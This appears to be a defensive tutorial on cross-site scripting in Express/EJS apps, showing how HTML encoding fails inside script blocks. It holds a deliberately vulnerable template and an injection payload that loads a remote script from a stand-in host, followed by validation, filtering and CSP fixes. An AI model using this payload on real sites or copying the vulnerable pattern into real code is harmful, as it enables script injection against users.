Escaping is an important security control for preventing cross-site scripting (XSS) in web applications. Escaping is the process of converting certain characters, such as <, >, and quotation marks, into safe equivalents. By escaping, you reduce the likelihood that the browser interprets those characters as HTML when it’s not supposed to.
OWASP.org provides us with a nice definition:
Cross-Site Scripting (XSS) attacks are a type of injection, in which malicious scripts are injected into otherwise benign and trusted websites. XSS attacks occur when an attacker uses a web application to send malicious code, generally in the form of a browser side script, to a different end user.
Flaws that allow these attacks to succeed are quite widespread and occur anywhere a web application uses input from a user within the output it generates without validating or encoding it.
Going forward, we'll refer to escaping as encoding. Encoding is a fancier way of describing the process of converting untrusted characters into a "safe" format.
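To make the idea concrete, here is a minimal sketch of an HTML encoder. The function name escapeHtml and the exact entity table are assumptions for illustration; template engines ship their own implementations, which may differ in detail.

```javascript
// Hypothetical helper: a minimal HTML encoder, for illustration only.
// Maps the characters that have special meaning in HTML to entities.
const HTML_ENTITIES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;'
};

function escapeHtml(untrusted) {
  // String() so that numbers and other non-string values do not throw
  return String(untrusted).replace(/[&<>"']/g, function (ch) {
    return HTML_ENTITIES[ch];
  });
}

console.log(escapeHtml('<script>alert("hi")</script>'));
// prints: &lt;script&gt;alert(&quot;hi&quot;)&lt;/script&gt;
```

After encoding, the browser displays the markup as text instead of parsing it as a script element.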
Template Engines to the Rescue...
Fortunately, several popular Node.js template engines offer encoding syntax so you can avoid a majority of scenarios that lead to XSS vulnerabilities.
Here are some syntax considerations for popular templating frameworks:
Template Engine | Encode output | Allow raw output (no encoding) |
---|---|---|
EJS | <%= text goes here %> | <%- text goes here %> |
Mustache and Handlebars | {{ text goes here }} | {{{ text goes here }}} |
Pug | #{ text goes here } | !{ text goes here } |
In today's post, we'll be using EJS.
Context is King
Despite use of encoding syntax, XSS can still occur. How is this possible?
In this example, we have a Node.js app that uses Express and EJS for templating. Our app takes a user-supplied age (via the age query parameter), determines the correct target date mutual funds on the server-side, and prints the fund name to the user (see circle #1 in the image below).
Here’s the Node.js code that selects a mutual fund given a user-supplied age. The code maps the 401k.ejs EJS template to three data objects:
- currentAge (which should always be an integer)
- retireAt (a hard-coded retirement age)
- selectedFund (a string returned from the determineTargetDateFund() method)
/* --------------------------------
// routes.js
-------------------------------- */
app.get('/401k', function(req, res) {
  // Taken directly from the query string, so this is untrusted input
  var currentAge = req.query.age;
  var retireAt = 65;
  var selectedFund = determineTargetDateFund(currentAge, retireAt);
  res.render('pages/401k', {
    currentAge: currentAge,
    retireAt: retireAt,
    selectedFund: selectedFund
  });
});
The template looks like this:
<!--
// 401k.ejs
//-->
<h3>What target date fund should you pick?</h3>
Enter your age:
<form action="/401k" method="GET">
  <input name="age" size="5" value="<%= currentAge %>" onblur="updateYearsAwayFromRetirement(this.value)">
  <input type="submit" value=" Go ">
  <br>
  <span id="yearsAwayFromRetirement" style="font-style: italic"></span>
</form>
<p> </p>
<% if(selectedFund) { %>
  You should select this fund: <span><%= selectedFund %></span>
<% } %>
<script language="javascript">
  //Initialize page with age submitted to server
  updateYearsAwayFromRetirement(<%= currentAge %>)
  function updateYearsAwayFromRetirement(ageValue) {
    retireAt = <%= retireAt %>;
    currentAge = ageValue;
    if(currentAge) {
      document.getElementById('yearsAwayFromRetirement').innerText = retireAt - currentAge + ' years away from retiring at age ' + retireAt;
    }
  }
</script>
Everywhere a template variable is printed to the page, we use the EJS encoding syntax: <%= template_variable_goes_here %>.
That's good, but not 100% foolproof.
JavaScript != HTML Context
If you look closely, you'll see the EJS variable currentAge printed as an argument of the JavaScript function updateYearsAwayFromRetirement() at template render time. This is JavaScript context (!)
This function is subsequently called by the browser on page load to calculate the number of years until retirement (circle #2 in the image above). If the user submitted an age of '45', then the page source will contain this call:
updateYearsAwayFromRetirement(45)
In general, you should avoid printing template data inside JavaScript context. Even if you are encoding the data, EJS and other template engines will NOT consider all possible contexts - such as the context of a JavaScript function or script block. This behavior means benign characters in an HTML context can be harmful inside a JavaScript context.
Attack Example
To recap, we print the currentAge variable using EJS encoding syntax (<%= %>) in two locations of 401k.ejs:
- As an argument inside updateYearsAwayFromRetirement() (JavaScript context)
- As the initial value of the "Enter your age" text field (HTML context)
The EJS encoding syntax works great in the HTML context, but fails to prevent XSS attacks in the JavaScript context. For example, consider what happens when you pass the following string into the age query parameter:
45); var s = document.createElement(`script`); s.src = `http://example.com/someEvilScript.js`; document.body.appendChild(s); //
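You'll notice we are using backticks (`) instead of quotes. EJS's HTML encoding converts single and double quotes into entities, but it leaves backticks, parentheses, and semicolons untouched. In HTML context, backticks are benign and treated as text. However, in JavaScript context, backticks delimit template literals, so the payload's strings survive encoding intact and the browser executes the injected statements!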
You'll see the full string appear in the source, and a request to someEvilScript.js in the console!
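The effect can be reproduced without a browser. The sketch below uses a hypothetical escapeHtml helper as a stand-in for the template engine's HTML encoder (an assumption; EJS's own implementation may differ in detail) and shows that the payload passes through unchanged.

```javascript
// Hypothetical stand-in for a template engine's HTML encoder.
function escapeHtml(untrusted) {
  const entities = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(untrusted).replace(/[&<>"']/g, function (ch) {
    return entities[ch];
  });
}

// The attack string from above, as it arrives in the age query parameter.
const payload =
  '45); var s = document.createElement(`script`); ' +
  's.src = `http://example.com/someEvilScript.js`; ' +
  'document.body.appendChild(s); //';

const encoded = escapeHtml(payload);

// None of the payload's characters are in the HTML encoder's table,
// so encoding is a no-op here.
console.log(encoded === payload); // prints: true

// What the browser receives inside the <script> block:
const renderedLine = 'updateYearsAwayFromRetirement(' + encoded + ')';
console.log(renderedLine);
```

The rendered line begins with a valid call, updateYearsAwayFromRetirement(45);, followed by the attacker's statements. The trailing // comments out the closing parenthesis that the template appends.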
How to Fix
In all cases, double-check context before you print data to a page. JavaScript context isn't the only "non-HTML" context that the browser interprets. Other contexts, like style tags and comment tags, will require different encoders.
(Read more at the OWASP.org XSS Prevention Cheat Sheet.)
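As one illustration of a context-specific encoder, the sketch below serializes a value for use inside a script block. It relies on JSON.stringify plus Unicode escapes for a few characters that are risky inside inline scripts. The function name encodeForScriptBlock is hypothetical, and this is a sketch under those assumptions rather than a vetted library; for production use, a maintained encoder is the safer choice.

```javascript
// Hypothetical helper: encode a value for embedding inside a <script> block.
// JSON.stringify turns strings into quoted literals, so injected text
// becomes data instead of code. The extra replacements keep sequences such
// as </script> or <!-- from ending or confusing the script element.
function encodeForScriptBlock(value) {
  const json = JSON.stringify(value);
  if (json === undefined) {
    // JSON.stringify returns undefined for functions, symbols, and undefined
    throw new TypeError('value is not JSON-serializable');
  }
  return json
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/&/g, '\\u0026')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

const hostile = '45); alert(1); //</script>';
console.log(encodeForScriptBlock(hostile));
// prints: "45); alert(1); //\u003c/script\u003e"
```

Because the result contains double quotes, it would have to be emitted with the raw output syntax (<%- %>), since the HTML encoder would otherwise turn the quotes into entities. That is only safe if every value written that way goes through such an encoder, which is one more reason to keep data out of JavaScript context where possible.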
Even though we're allowing EJS to automatically encode output, we need to add additional encoding on the server-side to avoid the attack scenario illustrated above.
In many scenarios, output encoding (i.e., converting unsafe characters into a safe format before printing them to a page) is the best defense against XSS attacks.
For the example above, we want to ensure the currentAge variable is always an integer. We can also perform input validation so that the correct mutual fund is reliably calculated without invalid characters ever getting in the way.
Input Validation
First, we want to make sure the app properly handles scenarios where non-integer values are passed into the age query parameter.
To do this, we perform input validation on the currentAge variable by verifying the data is an integer and greater than zero.
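/* --------------------------------
// routes.js
-------------------------------- */
app.get('/401k', function(req, res) {
  var currentAge = req.query.age;
  var retireAt = 65;
  //Perform input validation on the currentAge variable.
  //Query parameters arrive as strings (or arrays/objects), so check the
  //type and shape first, then compare the numeric value.
  if(typeof currentAge === 'string' && /^\d+$/.test(currentAge) && Number(currentAge) > 0) {
    //continue...
  }else{
    //throw error...
  }
});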
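Because query parameters arrive as strings, a strict check can be factored into a small helper. The sketch below is one way to do it; the function name parseAge and the upper bound of 120 are assumptions for illustration, not part of the original app.

```javascript
// Hypothetical helper: returns the age as an integer, or null if invalid.
function parseAge(raw) {
  // Reject arrays, objects, and missing values up front
  if (typeof raw !== 'string') return null;
  // Digits only: no signs, decimals, whitespace, or script fragments
  if (!/^\d{1,3}$/.test(raw)) return null;
  const age = Number(raw);
  // Assumed sanity bounds; adjust to the application's needs
  if (age <= 0 || age > 120) return null;
  return age;
}

console.log(parseAge('45'));            // prints: 45
console.log(parseAge('45); alert(1)')); // prints: null
console.log(parseAge('-3'));            // prints: null
```

In the route, a null result would map to the error branch, for example by responding with HTTP 400 instead of rendering the template.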
Output Encoding and Filtering
This is the most important step. As I mentioned earlier, encoding is the process of converting untrusted characters into a safe format. Filtering is a bit different and removes untrusted or unwanted characters from the data.
Whenever data is passed to the template engine, output encoding and/or filtering should occur - even if it's just a final sanity check. In our example, we're going to filter results by removing any non-digit characters from the currentAge variable.
/* --------------------------------
// routes.js
-------------------------------- */
...
res.render('pages/401k', {
  //Removes any characters that are 'not digits'.
  //String() guards against non-string query values such as arrays.
  currentAge: String(currentAge || '').replace(/\D/g,''),
  retireAt: retireAt,
  selectedFund: selectedFund
});
...
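To see what this filter does to the attack string from earlier, the sketch below applies the same regular expression outside of Express. The helper name digitsOnly is hypothetical.

```javascript
// Hypothetical helper wrapping the filter used in the render call.
function digitsOnly(value) {
  // \D matches any character that is not a digit 0-9
  return String(value || '').replace(/\D/g, '');
}

const payload =
  '45); var s = document.createElement(`script`); ' +
  's.src = `http://example.com/someEvilScript.js`; ' +
  'document.body.appendChild(s); //';

console.log(digitsOnly(payload));   // prints: 45
console.log(digitsOnly(undefined)); // prints an empty line
```

Filtering silently changes the data rather than rejecting it, so it works best as a last line of defense behind input validation.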
Recommendations
Issues like the one above tend to show up in web applications with JavaScript-heavy front ends. XSS in JavaScript context is not as common as XSS in HTML context, but our example highlights the risk of over-relying on template engines for security.
Here are a few tips:
- Understand your context and apply output encoding and/or filtering
- Avoid printing data in JavaScript context, period: In our example, we printed data from the server-side directly into JavaScript context. When possible, avoid printing data in JavaScript context entirely. If you cannot avoid it, be sure to apply additional output encoding logic on the server-side before passing it to the template engine.
- Harden web apps with a Content-Security-Policy: While not a fix for the underlying XSS vulnerability, this configuration can reduce the impact of an XSS attack.
- Keep business logic in one place: A general best practice.
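As a rough sketch of the Content-Security-Policy tip, the Express-style middleware below sets the header on every response. The directive values and the function names are assumptions; a real policy has to be tuned to the scripts and styles a site actually loads.

```javascript
// Hypothetical policy: only allow resources from the site's own origin.
const cspDirectives = {
  'default-src': ["'self'"],
  'script-src': ["'self'"],
  'object-src': ["'none'"]
};

// Builds the header value by joining each directive with its sources.
function buildCsp(directives) {
  return Object.keys(directives)
    .map(function (name) {
      return name + ' ' + directives[name].join(' ');
    })
    .join('; ');
}

// Middleware with the (req, res, next) signature Express expects.
function cspMiddleware(req, res, next) {
  res.setHeader('Content-Security-Policy', buildCsp(cspDirectives));
  next();
}

console.log(buildCsp(cspDirectives));
// prints: default-src 'self'; script-src 'self'; object-src 'none'
```

With Express, this would be registered via app.use(cspMiddleware). Note that a script-src policy without 'unsafe-inline' also blocks inline script blocks and inline handlers such as onblur, so the 401k.ejs template in this post would need its JavaScript moved to an external file.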